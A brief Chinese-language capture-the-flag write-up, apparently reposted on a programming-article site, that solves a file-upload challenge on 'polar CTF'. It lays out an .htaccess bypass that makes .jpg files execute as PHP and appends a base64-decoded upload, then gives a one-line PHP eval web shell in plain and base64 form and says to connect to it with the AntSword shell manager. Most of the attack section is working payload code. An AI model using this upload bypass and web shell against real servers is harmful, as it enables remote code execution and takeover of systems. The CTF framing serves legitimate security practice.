本文主要是介绍polar CTF上传,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1、题目
2、经过测试.htaccess绕过
三行代码解析:
将上传的.jpg文件解析成php文件
auto_append_file包含上传的文件
将上传的文件进行解码
AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=1.jpg"
3、上传文件名为1.jpg的图片码
马为
<?php eval($_POST[c]); ?>
base64后为
PD9waHAgZXZhbCgkX1BPU1RbY10pOyA/Pg==
访问为
蚁剑连接
这篇关于polar CTF上传的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!